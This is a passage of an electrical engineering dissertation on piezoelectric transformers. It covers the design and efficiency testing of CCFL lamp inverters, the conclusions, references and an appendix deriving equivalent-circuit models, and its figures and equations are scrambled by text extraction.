+ S1 Specifications for LR : Np = 19 turns, #29 AWG, Ns = 172 turns, #37AWG Core : PC44EEM12.7 /13.7-Z, Gap : 6 mil 1N4148 500 1 k Np :Ns VIN UC 3871 1 2 3 4 5 6 7 8 9 18 17 16 15 14 13 12 11 10 VIN VIN VGS1 VGS2 IFB 15 k 3.6 3.6 47 k 0.1 810 2.4 k 300 560 p 0.1 1N 4148 0.1 (b) pin 11 Fig. 5.10. Complete flyback SE-QR HVPT inverters : the reference circuit. (a) power stage. (b) control circuit. This circuit is used as a reference circuit for efficiency comparison with different HVPT inverters. 127 of CCFL HVPT inverters 8 8.5 9.5 10 12 14 16 0.7 0.74 0.78 HVPT CCFL inverters (Reference Circuit) Input voltage (V) LAMP is replaced with a 98.2-k resistor Fig. 5.11. Efficiency of experimental CCFL HVPT inverters ( reference circuits ). Four experimental CCFL HVPT inverters show almost identical efficiency characteristics. This indicates the uniformity of HVPT and the feasibility to use HVPT in high-voltage applications. 5.6 Comparison Between Conventional HV Transformer with HVPT Conventionally, the number of turns for the secondary of an HV transformer exceeds a thousand turns for CCFL applications. The immediate advantages of using HVPTs over using conventional HV transformers include no winding and automation. The following experimental circuits show the performance comparison of HVPTs and HV transformers for CCFL applications. At first, a complete HVPT CCFL inverter and a commercial self-oscillated CCFL inverter were employed to examine their performance. Both inverters are operated in the constant-frequency control mode, and the comparison is made via the specification of the conventional CCFL inverter provided by Delta Electronics Inc. 128 5.6.1 Specifications The first specifications for the CCFL inverters are recorded below: input voltage : 8 volt - 16 volt, output current : 5 mA (rms), and output power : 2.5 watts. 5.6.2 Conventional CCFL Inverter Figure 5.12 (a) shows the power stage of a conventional CCFL inverter, which follows a two-stage approach. The first stage is a buck converter followed by a self-oscillated sine wave oscillator. In the oscillator, a parallel resonant tank is formed by T 1 and C P , and L RF is a choke to realize a current source for the tank. C B performs the function of a ballast to limit the lamp current, and it needs to withstand high voltage. Generally, C B is a high-frequency and high- voltage capacitor, and choosing the right capacitor is critical to limiting the variations of the inverter efficiency to the range of 5% to 10% [50]. 5.6.3 Experimental Results It is very difficult to prevent the loading effect of the capacitance of the high-voltage probe when a commercial CCFL inverter, having a capacitor in series with CCFL as its ballast, is tested. Therefore, an illumination meter is required to measure the output power of CCFL. For the CCFL inverter with the HVPT, the efficiency of the CCFL could be measured and calculated by measurement waveforms, but those experimental results include the effect of the capacitance of the high-voltage probe. To verify the performance of both HVPTs and commercial inverters, resistors are used to represent the CCFLs. Four complete inverters with HVPT and two commercial CCFL inverters were built and tested for better agreement with measurement results shown in Fig 5.11. Figure 5.12 (b) shows that the efficiency of the HVPT inverter is better than that of the conventional inverter under the low-line condition and worse than that of the conventional inverter under the high-line condition. However, the circuit is greatly simplified by employing HVPTs instead of HV transformers, and no ballast is required. If an HVPT with very high step-up ratio can be built by using the stacked structure, it is not necessary to have a second stage step-up. The profile of this HVPT inverter can be further reduced from 5.5 mm. 129 L A M P T1 : HV Tr. S1 VIN CBa LRF CP (a) input voltage : 8 volts - 16 output current : 5 mA (rms), output power : 2.5 watts. of different HVPT inverters 8 8.5 9.5 10 12 14 16 0.7 0.74 0.78 CCFL inverter (Conventional) HVPT CCFL inverters (Reference Circuit) Input voltage (V) (b) LAMP is replaced with a 98.2- k resistor Fig. 5.12. Efficiency comparison between conventional CCFL inverter and the reference circuit. (a) power stage of conventional CCFL inverters. (b) efficiency of these two different types of inverters. 130 5.7 Comparison Between Constant- and Variable-Frequency HVPT CCFL Inverters The objective of this comparison study is to discuss the merits and demerits of two different control methods applied to HVPTs. This set of inverters includes both constant and variable frequency controlled complete HVPT inverters. The comparison has been made via the specification of a prototype variable-frequency-controlled HVPT CCFL inverter from Tokin Corp. 5.7.1 Specifications input voltage : 12 volts - 17 volts, output current : 7 mA (rms), and output power : 5 - 6 watts. 5.7.2 Two-Leg SE-QR HVPT CCFL Inverters Figure 5.13 (a) shows the power stage of these modified inverters [48]. The HVPT with a very high step-up ratio, approximately 1:32 @ matched CCFL load, has been installed. This HVPT inverter is composed of two SE-QR dc/ac inverters, and control signals of the switches are arranged complementarily. Instead of producing half of the sine wave in the SE-QR amplifier, a nearly sinusoidal waveform is obtained in the input of the HVPT. Therefore, this topology allows to double the voltage gain of the inverter. As a result, the voltage gain , measured from the RMS output voltage to dc input voltage, is at least 64 under the nominal operation of the CCFL. In this circuit, two switches and two inductors are required. The variable-frequency control is used in order to ignite the CCFL easily and to prevent adding any more components. 5.7.3 Experimental Results At the startup of the CCFL, the impedance of the CCFL increases, and the striking voltage of the CCFL is very high. It can be seen from Fig. 5.2 that the voltage gain of the HVPT increases with the load resistance under matched conditions. If constant-frequency control is used, the voltage gain will not increase dramatically upon startup. In this regard, the variable- frequency control is a better choice for striking the lamp and compensating for temperature effects of the CCFL inverter with the HVPT. However, from the experimental results shown in Fig. 5.13 (b), the efficiency of constant-frequency-controlled HVPT inverters was higher than that of their counterparts at high input line when the controlled frequencies of the counterparts were pushed away from fs. 131 input voltage : 12 volts- 17 output current : 7 mA (rms) output power : 5 - 6 watts 1:32 HVPT @ Rload = 150 k L A M P (a) Constant Freq. Controlled Reference HVPT INV. Variable Freq. Controlled Tokin HVPT INV. 12 14 16 0.78 0.8 0.82 of different HVPT inverters Input voltage (V) (b) 13 15 LAMP is replaced with a 125- k resistor VIN Fig. 5.13. Two-leg SE-QR HVPT CCFL inverter and its experimental results. (a) power stage. (b) efficiency comparison with the reference circuit in Fig. 5.8 (a). 132 5.8 Conclusions While reviewing all the lamp inverters with HVPT presented in the published papers, one can see that it is necessary to use at least one magnetic component. Usually, this inductor has the highest profile among all components of the circuits employing HVPTs, and it introduces EMI. How to avoid the use of the magnetic core in HVPT circuits seems to be the most challenging issue in developing HVPT circuits. The other design issues, such as temperature effects, possibility of self oscillation, and lifetime test, are still under development. However, the merits of the HVPT make it very attractive to industry and worthy of further exploration. 133 6. Conclusions and Future Works A systematic approach towards the design and analysis of PT converters has been conducted in this dissertation. It is developed by introducing lumped models of the PT, optimizing the efficiency of the PT, designing the power amplifiers and matching networks, and building CCFL inverters for HVPT applications which are already commercialized. Because of the spurious vibrations existing in LVPT-21, its lumped model includes more than three satellite overtones and becomes very complex. However, the developed lumped model for LVPT-21 can actually predict the efficiency drop at unwanted spurious vibration frequencies. A design strategy to control the voltage gain of LVPT-21 is then limited to constant-frequency control for nonmonotonous voltage-gain curve. As far as the efficiency of LVPT-21 is concerned, the power-flow method is developed to find out the optimal load admittance so that the efficiency of the PT is maximized. The maximal efficiency is calculated where the Linvill constant c is close to unity. This results in the calculated efficiencies being very sensitive to the parameters used. Because the two-port parameter vs. frequency curves of LVPT-21 are not smooth curves, the calculated efficiency vs. frequency curve of LVPT-21 is very irregular. However, the calculated efficiency curves are smooth functions with respect to frequencies when the lumped model of LVPT-21 is used. In other words, the optimal load admittance Y L can be theoretically determined by measured two- port parameters only. Nevertheless, the power-flow method can still be applied to the lumped model, and a similar efficiency curve shows where the efficiency drops significantly at spurious vibration frequencies. At the same time, the voltage-gain curves, obtained from either two-port parameters or the lumped model, have good agreement in shape and magnitude. This verifies the usefulness of the lumped model of LVPT-21. This modeling technique can be extended to other LVPTs for spurious vibration frequencies or overtones of PTs. In Chapter 3, the optimal load of the high-voltage PT has been proved to be resistive load only. Because of the high-impedance characteristics at the output of the PT, the matching inductance is too large to realize if the power-flow method is applied to HVPTs. The derivation of the optimal resistive load of the HVPT is obtained both from a systematic procedure of circuit rearrangements and from a theoretical derivation in the L-M plane directly. 134 A design-oriented analysis for various PT converters is presented. This analysis uses the fundamental of the voltage in the amplifier circuits, the lumped model of the PT, and equivalent impedance for the matched rectifier and load. As a result, the PT converters can be represented by very simple equivalent circuits. The theoretical results obtained from the equivalent circuits have been verified and compared with those of experimental waveforms, measured for LVPT and HVPT applications. The analysis by equivalent circuits makes it possible that all the currents, voltages, and the switching frequency can be normalized easily. This normalization provides a simple method for the design of the parameters of the power amplifier circuits. Also, the peak voltage and current stress can be calculated using this simplified analysis. To compare the performances of different power amplifier topologies, a design example is given for the application of LVPT converters for on-board power supplies. The half-bridge PT converter gives the best efficiency, but it has the highest component count. The topology of the single-ended quasi-resonant converter is the simplest one, but it is not ideal for LVPT converters because of the high step-up ratio , which is usually greater than unity. The SE-MR LVPT converter needs a resonant tank compared to the SE-QR converter, and variable-frequency control is also needed. To control the voltage gain of LVPT-21, variable-frequency control is not suitable because of the existence of spurious vibration frequencies. The designs show that half- bridge amplifiers are suitable for step-down applications employing LVPTs. On the other hand, SE-QR PT converters are good for step-up applications with HVPTs. A practical example is presented, and the design procedure is verified with a breadboard implementation of the CCFL HVPT inverter. In the example, a secondary winding needs to be added to the resonant inductor to increase the gain of the converter, and the constant-frequency control is used in the complete inverter. A comparison of constant-frequency and variable- frequency control is based on the efficiencies of the experimental inverters and a commercial HVPT inverter by Tokin. The latter gives a better efficiency than the former at low-line, where the switching frequency Fs is optimized to full-load conditions. With variable-frequency control, Fs is far away from the resonant frequency fs of the PT for high-line operation. Hence, the efficiency of the PT decreases, and so does that of the inverter. Piezoelectric transformers are new and promising components in power electronics. They are inexpensive, low-profile, and suitable for automation. With these merits, the applications of various types of the PT emerge quickly. Future research goals include the following: Future work would include using this systematic approach to characterize the PT so that the requirement of matching networks could be eliminated, and the PT can be incorporated into the amplifier design. As a result, the number of magnetic components is minimized and the advantages of adopting PT into power electronics become significant. 135 To maximize the benefit of using the HVPTs, the step-up ratio of the HVPT under nominal load needs to be increased. The nonlinear properties of the PTs, such as aging, temperature effect, and packaging, have to be studied to assure the reliability of the PT products. In addition, for mass production of PT converters, tuning each PT amplifier circuit to an optimal index is unavoidable because the resonant frequencies of PTs are different from each other. Therefore, to design a reliable self-oscillated or peak-power-tracked PT converter is very important from a manufacturing perspective. 136 References [1] C. A. Rosen, "Ceramic Transformers and Filters," Proc. Electronic Comp. Symp., pp. 205- 211, 1956. [2] W. G. Cady, Piezoelectricity. NY: McGraw, 1946. [3] W. P. Mason, Electromagnetic Transducers and Wave filters. NY: 2nd ed., D. Van Nostrand Company Inc., pp. 399-404, 1948. [4] H.W. Katz, Solid State Magnetic and Dielectric Devices. NY:, Wiely, pp.94-126, 1959. [5] D.A. Beringcourt, D.R. Curran and H. Jaffe, Piezoelectric and Piezomagentic materials and their function in transducers, In: W.P. Mason, ed., Physical Acoustics, vol. 1A, Academic Press, New York, pp. 233-249, 1964. [6] H.F. Tiersten, Linear Piezoelectric Plate Vibrations, Plenum Press, New York, 1969. [7] D.A. Beringcourt, Piezoelectric Crystals and Ceramics, In: O.E. Mattiat, ed., Ultrasonic Transducer Materials, Plenum Press, New York, pp. 63-124, 1970. [8] B. Jaffe, W.R. Cook Jr. and H. Jaffe, Piezoelectric Ceramics. NY: Academic Press, pp. 7- 47, 1971. [9] I. Keizi, Self-exciting type high voltage generation apparatus utilizing piezoelectric voltage transforming elements, US Patent, No. 3679918, 1969. [10] Y. Kodama, O. Kumon and N. Saito, Study of Piezoelectric Ceramic Transducer for High Voltage Generation, Sumitomo Electric Technical Review, No. 14, pp. 78-87, 1970. [11] D. A. Berlingcourt, C. Falls, L. S. Sliker, and S. Heights, Piezoelectric transformer, US Patent, No. 3736446, 1973. [12] S. Takahashi, Y. Ebata and K. Kishi, Applications of acoustic surface wave to power electronics, Power Electronic Specialists Conf. Record, pp. 187-196, 1974. [13] E. Dieulesaint, D. Royer, D. Mazerolle, and P. Nowak, Piezoelectric transformers, Electronics Letters, Vol. 24, No. 1, pp. 444-445, Mar. 1988. 137 [14] S. G. Bochkarev, D. G. Voronin, G. A. Danov, V. V. Drozhzhev, and V. N. Frolov, Use of integrated circuits of series 1114 in control system for high-voltage piezoelectric- semiconductor converters, Moscow Institute of Radio Engineering, Electronics, and Automation, pp. 868-870, 1991. [15] A.X. Kuang, T.S. Zhou, C.X. He, L.Y. Chai, and J.F. Xie, "Piezoelectric ceramic material with large power output ability," US Patent, No. 5173460, 1992. [16] O. Ohnishi, H. Kishie, A. Iwamoto,T. Zaitsu, and T. Inoue, "Piezoelectric ceramic transformer operating in thickness extentional mode for power supply," Ultrasonics Symposium, pp. 483-488, 1992. [17] T. Zaitsu, T. Inoue, O. Ohnishi, and A. Iwamoto, "2 MHz power converter with piezoelectric ceramic transformer," IEEE. Intelec Proc., pp. 430-437, 1992. [18] T. Tanaka, "Piezoelectric Devices in Japan," In: C. Z. Rosen, ed., Piezoelectricity. NY: American Institute of Physics, pp. 289-309, 1992. [19] C.Y. Lin and F.C. Lee, "Development of a Piezoelectric Transformer Converter," VPEC Power Electron. Sem. Proc., pp. 79-85, 1993. [20] T. Zaitsu, O. Ohnishi, T. Inoue, M. Shoyama, T. Ninomiya, F.C. Lee, and G.C. Hua, "Piezoelectric transformer operating in thickness extensional vibration and its application to switching converter," IEEE. PESC'94 Record, June, 1994. [21] C.Y. Lin and F.C. Lee "Design of a Piezoelectric Transformer Converter and Its Matching Networks," Power Electronic Specialists Conf. Record, pp. 607-612, 1994. [22] C.Y. Lin and F.C. Lee, " Design Of Piezoelectric Transformer Converters Using Single- Ended Topologies," VPEC Power Electron. Sem. Proc., 1994. [23] C.Y. Lin and F.C. Lee, " Piezoelectric Transformer and its applications," VPEC Power Electron. Sem. Proc., 1995. [24] I. Ueda and S. Ikegami, Piezoelectric properties of modified PbTiO 3 Ceramics, Jpn. J. Appl. Phys., Vol. 7, pp. 236-242, 1968. [25] S. Takahashi, Longitudinal mode multilayer piezoelectric actuators, Ceramic Bulletin, Vol. 65, pp. 1156-1157, 1986. [26] H. Tsuchiya and T. Fukami, Design principles for multilayer piezoelectric transformers, Ferroelectrics, Vol. 68, pp. 225-234, 1986. [27] M. Ueda, M. Satoh, S. Ohtsu, and N. Wakatsuki, "Piezoelectric transformer using energy trapping of width-shear vibration in LinbO 3 plate," Ultrasonics Symposium, pp. 977-980, 1992. [28] N. Dai, A. W. Lofti, G. Skutt, W. Tabisz and F. C. Lee, A comparison study of high- frequency, low-profile planar transformer technologies, Proc. of IEEE App. Power Elec. Conf, 1994. 138 [29] W. Chen and F.C. Lee, An Improvement of a Nondimming Electronic Ballast for the Fluorescent Lamp, , VPEC Power Electron. Sem. Proc., 1995. [30] E. A. Gerber, A review of methods for measuring the constants of piezoelectric vibrators, Proc. of the IRE, pp. 1103-1112, Sep. 1953. [31] E. Hanfner, The piezoelectric crystal unit -- definition and methods of measurement, Proc. of IEEE, Vol. 57, No. 2, pp. 179-201, Feb. 1969. [32] R. Holland and E. P. Eernisse, Accurate measurement of coefficients in a ferroelectric ceramic, IEEE Trans. Sonic and Ultrasonics, Vol. SU-14, No. 4, pp. 173-181, Oct. 1969. [33] Y. Tsuzuki and M. Toki, Precise determination of equivalent circuit parameters of quartz crystal resonators, Proc. of IEEE, pp. 1249-1250, Aug. 1976. [34] M. Toki, Y. Tsuzuki, and O. Kawano, A new equivalent circuit for piezoelectric disk resonators, Proc. of IEEE, Vol. 68, No. 8, pp. 1032-`033, Aug. 1980. [35] J.-P. Rivera and H. Schmid, "Piezoelectric measurements of Ni-I boracite by the technique of admittance circle and motional capacitance," In: G. W. Taylor, ed., Piezoelectricity. NY: Gordon and Breach Science Publishers, 1985. [36] P. Gonnard and R. Briot, Studies on dielectric and mechanical properties of PZT doped ceramics, using a model of losses, Ferroelectrics, vol. 93, pp. 117-126, 1989. [37] S. Hirose, Y. Yamayoshi, M. Taga, and H. Shimizu, A method of measuring the vibration level dependance of impedance-type equivalent circuit constants, Japanese Journal of Applied Physics, Vol. 30, pp. 117-119, 1991. [38] R. Briot, P. Gonnard and, M. Troccaz, Modelization of the Dielectric and Mechanical Losses in Ferroelectric Ceramics, pp. 580-583, 1991. [39] S. Hirose, M. Aoyagi, Y. Tomikawa, Dielectric loss in a piezoelectric ceramic transducer under high-power operation; Increase of dielectric loss and its influence on transducer efficiency, Jpn. J. Appl. Phys., Vol. 32, pp. 2418-2421, 1993. [40] J. G. Linvill and J. F. Gibbsons, Transistor and active circuit. NY: McGraw, Chap. 11 and 14, 1961. [41] J. Choma,Jr., Electrical networks theory and analysis. NY: John Wiley & Sons, pp. 178- 197, 1985. [42] N. O. Sokal and A. D. Sokal, "Class E-A new class of high-efficiency tuned single-ended switching power amplifiers," IEEE Jl. Solid-State Circuits, Vol. SC-10, no. 3, pp. 168-176, 1975. [43] M. K. Kazimierczuk and K. Puczko, "Exact analysis of class E tuned power amplifier at any Q and switch cycle," IEEE Trans. Circuits and Systems, Vol. CAS-34, no. 2, pp. 149- 158, 1987. 139 [44] M. K. Kazimierczuk and X. T. Bui, "Class-E dc/dc converters with a capacitive impedance inverter," IEEE Trans. Industrial Electron., Vol 36, no. 3, pp. 425-433, 1989. [45] E.X. Yang, Qiong Li and F.C. Lee, "Analysis and Design of Single-Ended-Parallel Multi- Resonant Converter," Power Electronic Specialists Conf. Record, pp. 1405-1412, 1994. [46] D. Frederick and T.S. Chang, Continuum mechanics. Cambridge, Scientific Publishers, Inc., 1972. [47] Dong-Bing Zhang, "Switching mode power source impedance measurement and EMI filter characterization", Thesis, VPI&SU, September 1996. [48] S. Kawashima, O. Ohnishi, H. Hakamata, A. Fukuoka, T. Inoue, and S. Hirose, "Third order longitudinal mode piezoelectric ceramic transformer and its application to high- voltage inverter," Ultrasonics Symposium, pp. 525-530, 1994. [49] PJM Smidt and JL Duarte, "Powering neon lamp through piezoelectric transformers," Power Electronic Specialists Conf. Record, pp. 310-315, 1996. [50] Dan Ward " Matching inverters to CCFL backlights," Information Display, " pp. 15-17, Feb. 1992. [51] T. Zaitsu, T. Shigehisa, M. Shoyama, T. Ninomiya, "Piezoelectric transformer converter with PWM control," IEEE APEC Proc., pp. 279-283, 1996. 140 APPENDIX A : Physical Modeling of the PT A.1 Introduction Around 1950s, the piezoelectric transformers just emerged and their equivalent circuits had been derived in [3-5] in the forms of different basic model cells. Only the complete model for the longitudinal mode had been described completely [3,4]. Nowadays, the thickness extensional mode multilayer PTs [16] are adopted to enhance the performance of the PTs, for example to increase the gain of the PTs and to improve their power handling. To deal with these multilayer PTs, correct mechanical and electrical boundary conditions have to be created to obtain meaningful equivalent circuits A.2 Model of the Longitudinal Mode PT The longitudinal PT is composed of two parts which are the side-plated bar and the end- plated bar. The side-plated bar functions as an actuator, where mechanical vibration is generated due to electrical excitation on their electrodes, as shown in Fig. A.1 (a). On the other hand, the side-plate bar works like a sensor, where the mechanical vibration is transferred to electrical energy, as shown in Fig. A.1 (b). To describe the coupling between electrical and mechanical properties, the linear piezoelectric equations are: S s T d E D d T E E T + + . (A.1) Instead of using [T, E] as independent variables, it is possible to use [T, D] [S, D], and [S,E] to be independent ones. If (A.1) is solved for [T, D] and [S, D] to give S s T g D E g T D D T + + , (A.2) T c S h D E h S D D S + . (A.3) 141 In a similar way, other linear piezoelectric equations include T c S e E D e S E E S + , (A.4) (a) x 1 x 3 x 2 E v 1 F 1 v 2 F2 I x 1 u 1 u x 1 x 1 1 u + 1 P (b) LOAD v 1 F1 v 2 F2 I x1 x3 x2 P Fig. A.1. Components of the longitudinal PT. (a) the side-plated bar. (b) the end-plated bar. When a electrical excitation is stimulated on electrodes of the side-plated bar, a longitudinal wave will be generated along x1-direction. The mechanical vibration will generate electric charges in the end-plated bar. Thus, input electrical energy applied to the side-plated bar is transformed to load via the end-plated bar. 142 where T: stress, S: strain, D: electric displacement, E: electric field, s: Elastic compliance constant, c: Elastic stiffness constant, : Permittivity component, : Impermittivity component, d, h, g, e : Piezoelectric constants, S (superscript) : At constant strain, T (superscript) : At constant stress, D (superscript) : At constant electric displacement, E (superscript) : At constant electric field, and h c g D . (A.5) For the following analysis, all strains and stresses are assumed to occur in only one direction. In other words, the shear stress and shear strain are neglected. A.2.1 Side-Plated Bar A.2.1.1 Derivation of One-Dimensional Wave Equation From Fig. A.1 (a)., the electrical excitation, E, is applied to top and bottom electrodes of the piezoceramic side-plated bar in x 3 or thickness direction. Stresses along x 2 and x 3 are zero, T 2 = T 3 , and this means the piezoceramics are free to vibrate along the x 2 and x 3 directions. At the same time, the electrical field is distributed uniformly only along x 3 direction, and it indicates that E 1 = E 2 = 0. Therefore, electrical field, E 3 , and mechanical stress, T 1 , are chosen as independent variables of the linear piezoelectric equations. This is a one-dimensional problem, and the electromechanical equations can be expressed in the following equation: S s T d E D d T E E T 1 11 1 31 3 3 31 1 33 3 + + . (A.6) For this one-dimensional vibration, Fig. A.1 (a). shows the basic component before applying electrical field with a solid line, and a strained component with a dashed line. Then the total strain equals u x x 1 1 1 . Because the linear relationship between stress and strain, the total stress applied to the basic component is 143 T T T dT dx x 1 2 1 1 1 . (A.7) According to Newtons first law, F = m a, and F = T Area. The net force can be expressed as a function of stress: F A x u t T x x A 1 1 2 1 2 1 1 1 . (A.8) Stress, T 1 , can be replaced by Strain, S 1 , in (A.6), and the previous equation becomes A x u t x s S d s E x A E E 1 2 1 2 1 11 1 31 11 3 1 1 ( ) . (A.9) Since d dx E 1 3 0 , the one dimensional wave equation is 2 1 2 11 2 1 1 2 1 u t s u x E . (A.10) If the excitation electric field, E, is sinusoidal , E 3 = E 0 e jt , a separate method is used to solve this wave equation. Let u X 1 1 ~ , the previous equation is then arranged as 2 1 2 11 2 1 1 2 1 ( ~ ) ( ~ ) X t s X x E (A.11) 1 11 1 1 2 s X X T T E ~ ~ . (A.12) The solution for the wave equation (A.12) is u X x t B x B x e j t 1 1 1 1 1 2 2 + ( ) ~ ( ) ( sin cos ) , (A.13) where c and c s E 1 33 . The electrical and mechanical boundary conditions can be inserted into (A.6) and (A.7). As a result, B 1 and B 2 are calculated directly, and the impedance or admittance of the PT can be derived [5]. However, it is preferable to obtain the general PTs equivalent circuit first and apply the network theory to derive impedance or admittance of the PT by adding suitable electrical and 144 mechanical boundaries. Therefore, analytical expressions between electric properties ( voltage and current ) and mechanical properties ( force and velocity ) have to be derived first. From Fig. A.1 (a)., the analytical equations for forces and velocities at the boundary of the material along the x 1 axis are shown in the following: F T A s S d s E A e s u x d s E A e A s B x B x e d A s E e x E E x j t E E x j t E x j t E j t 1 1 0 11 1 31 11 3 0 11 2 1 1 31 11 3 0 11 1 1 2 1 0 31 11 3 1 1 1 1 1 1 ( ) ( cos sin ) . (A.14) To simplify the analysis, phasor representation is used and the previous equation becomes: $ $ F A s B d A s E E E 1 11 1 31 11 3 + (A.15) $ $ ( cos sin ) $ F T A A s B l B l d A s E x l E E 2 1 11 1 2 31 11 3 1 (A.16) v u t v j B x 1 1 1 0 1 2 $ (A.17) v u t v j B l B l x l 2 1 2 1 2 1 + $ (( sin cos ) . (A.18) From (A.17)-(A.18), B 2 and B 1 are B j v 2 1 1 $ , (A.19) B j l v j v l j j v l v l 1 2 1 1 2 1 1 sin ( $ $ cos ) ( $ tan $ sin ) . (A.20) 145 2.2.1.2 Basic Model Cell The electrical properties, voltage and current, are derived according to the following equations: V E dx I d dt D ds , . (A.21) Therefore, $ $ $ V E dx E h h 0 3 3 3 , and (A.22) ( ) ( ) ( ) I d dt D W dx W d dt d T E dx I j W d T E dx j W d s S d E dx j W E l j W d s u u j W l d Y E W d Y v l T l T l E l T E x l x T E T E + + _ , + _ , + 3 1 0 31 1 3 1 0 31 1 3 1 0 31 1 31 3 1 0 3 31 1 1 0 2 31 3 31 1 1 1 1 $ $ $ $ $ $ $ $ $ $ $ ( ) v j W l h d Y V T E T 2 2 31 1 + _ , $ (A.23) The electrical clamped impedance, Z E LC , is defined when the piezoceramics are clamped at both ends , $ $ v v 1 2 0 , and can be expressed as: ( ) Z h j W l k E LC T 1 31 2 . (A.24) With Z E LC , (A.23) can be rearranged to give ( ) ( ) $ $ $ $ $ $ $ . I W d Y v v Z V v v Z V E E LC E LC + + + + 31 1 2 1 2 1 1 (A.25) where W d Y E 31 . (A.26) 146 Substituting (A.19) and (A.20) to (A.15) and (A.16), F 1 and F 2 in phasor representation become $ ( $ tan $ sin ) $ tan $ sin $ $ ; F A s j v l v l d A s V h Z j l v Z j l v V E E o o 1 11 1 2 31 11 1 2 1 + + (A.27) $ ( ( $ tan $ sin ) cos $ sin ) $ sin $ tan $ $ , F A s j v l v l l v j l d A s E Z j l v Z j l v V E E o o 2 11 1 2 1 31 11 3 1 2 1 _ , + (A.28) where ( ) Z A s s h W s Y h W o E E E E 11 11 11 11 1 . (A.29) Instead of using (A.25), (A.27), and (A.28) to represent the electromechanical system, a different notation is used to constitute the electrical network more easily as shown below $ $ $ $ $ $ F F V a a a a a a a a a v v I 1 2 11 12 13 21 22 23 31 32 33 1 2 1 ] 1 1 1 1 ] 1 1 1 1 ] 1 1 1 ; (A.30) $ $ $ $ V v v Z I E LC + + 1 2 ; (A.31) $ tan $ sin $ $ tan $ sin $ $ ; F Z j l v Z j l v V Z j l v Z j l v Z I o o o o E LC 1 1 2 2 1 2 2 _ , + _ , + (A.32) $ sin $ tan $ $ sin $ tan $ $ . F Z j l v Z j l v V Z j l v Z j l v Z I o o o o E LC 2 1 2 2 1 2 2 _ , + _ , + (A.33) 147 Z 3 Z 1 Z 1 Z 5 Z 4 Z 2 Z Z 6 $ F 2 $ F 1 $ v 2 $ v 1 I V Fig. A.2. The three-port network for the side-plated bar. v, F1, and F2 are derived from one- dimensional wave equation. The three-port network can not separate the electrical and mechanical systems clearly. However, 2 Z E LC term in Z 2 offers a solution by introducing an ideal transformer whose turns ratio is equal to . If the velocity in the mechanical system is analogous to the current in the electrical system, it is possible to build a three-port network [3], as shown in Fig. A.2, and the impedances Z 1 to Z 6 are equal to Z Z j l Z j l Z Z Z j l Z Z Z Z Z j l Z j l Z Z Z Z Z o o E LC o E LC E LC o o E LC E LC E LC 1 2 2 3 4 5 6 tan sin ; sin ; ; tan sin ; ; . (A.34) These mathematical expressions do not clearly represent the coupling between the electrical and mechanical systems. By introducing a transformer, (A.31) to (A.33) can be rearranged to give 148 ANALOG TO F F $ $ 1 2 v v $ $ 1 2 1 2 1 2 E I E I Co 1 : V I + E _ + E _ I I Z 1 Z 2 Z 1 2 1 1 2 Z j o sin Z 2 = l Z 1 = j Z o 2 l tan W d Y E 31 11 vsound vsound s E 1 33 h j A Z E LC T ( ) k 1 31 2 Z o Y h W E 11 A : surface area = l W Co = j Z E LC 1 Fig. A.3. Basic model for the side-plated bar. If = 0, it means that the piezoelectric constant is equal to zero. There is no coupling between electrical and mechanical systems. 149 ( ) ( ) $ tan sin $ sin $ $ $ tan $ sin $ $ $ ; F Z j l Z j l v Z j l v v V j Z l v Z j l v v V o o o o o 1 1 1 2 1 1 2 2 _ , + + + + + + (A.35.a) ( ) ( ) $ tan sin $ sin $ $ $ tan $ sin $ $ $ ; F Z j l Z j l v Z j l v v V j Z l v Z j l v v V o o o o o 2 2 1 2 2 1 2 2 _ , + + + + + + (A.35.b) $ ( $ $ ) $ V Z v v Z I E LC E LC + + 1 2 . (A.35.c) Figure A.3. shows the basic equivalent circuit for a side-plated piezoceramics, and W d Y E 31 11 . If 0, it means the piezoelectric constant d 31 = 0, and there is no coupling between the electrical and mechanical systems. This model is good for any mode of operation for the side-plated piezoceramics. A.2.2 End-Plated Bar A.2.2.1 Derivation of One-Dimensional Wave Equation Figure A.1 (b). shows a piezoceramic side-plated bar, and the electrical excitation, E, is generated across electrodes along x 1 or in the longitudinal direction. Stresses along x 2 and x 3 are zero, T 2 = T 3 = 0, and this means that the piezoceramics are free to vibrate along x 2 and x 3 directions. The piezoceramic material is considered to be nonconductive and no fling flux; therefore D 2 = D 3 = 0. Electrical flux, D 1 , and mechanical stress, T 1 , are selected to be the independent variables of the linear piezoelectric equations: S s T g D E g T D D T 1 11 1 11 1 1 11 1 11 1 + + , (A.36) From Fig. A.1 (a)., a similar derivation in the last section can be obtained from Newtons law, F = m a, to give F A x u t T x x A 1 2 1 2 1 1 1 , (A.37) Stress, T 3 , can be replaced by Strain, S 3 , in (A.36), and the previous equation becomes 150 A x u t x s S g s D x A D D 1 2 1 2 1 11 1 11 11 1 1 1 ( ) . (A.38) Since x D 1 1 0 , the one-dimensional wave equation is 2 1 2 11 2 1 1 2 1 u t s u x D . (A.39) If the excitation strain, S, is sinusoidal , D 1 = D 0 e jt , the solution for the wave equation (A.39) is u B x B x e j t 1 1 1 2 1 + ( sin cos ) , (A.40) where c and c s D 1 11 (A.41) To simplify the analysis, phasor representation is used and has already been introduced in the previous section. The forces at both ends of the end-plated bar are shown in Fig. A.1 (b)., and are equal to $ $ F A s B g A s D D D 1 11 1 11 11 1 + ; (A.42) $ ( cos sin ) $ F A s B l B l g A s D D D 2 11 1 2 11 11 1 + . (A.43) 2.2.2.2 Basic Model Cell The electrical properties, voltage and current, are derived from (A.21). I t D dA I j D h W A 1 1 ; $ $ ; (A.44) 151 ( ) ( ) ( ) ( ) $ $ $ $ $ $ $ $ $ $ $ $ $ , V E dx g T D dx g s S g D dx D l g s u u l g s D g j s v v Z I l E l D l T D x l x T D D E LC + + + _ , + + 1 1 0 11 1 11 1 3 0 11 11 1 11 1 1 0 11 1 11 33 1 1 0 11 2 11 11 1 11 11 1 2 1 1 (A.45) where Z E LC is the clamped impedance and equals Z l j h W g s E LC T D _ , 11 11 2 11 . (A.46) Substituting B1 and B2 into (A.42) and (A.43), F 1 and F 2 in phasor representation become $ ( $ tan $ sin ) $ tan $ sin $ $ ; F A s j v l v l g A s I j A Z j l v Z j l v g j s I D D o o D 1 11 1 2 11 11 1 2 11 11 1 + + (A.47) $ ( $ tan $ sin ) cos $ sin $ sin $ tan $ $ ; F A s j v l v l l v j l g A s D Z j l v Z j l v g j s I D D o o D 2 11 1 2 1 11 11 1 1 2 11 11 1 _ , _ , + (A.48) where Z A s s h W o D D 33 33 . (A.49) From (A.45) to (A.48), a three port network is built, as shown in Fig. A.2, and the impedances Z 1 to Z 6 equal 152 Z Z j l Z j l g j s Z Z j l Z g j s Z Z j l Z j 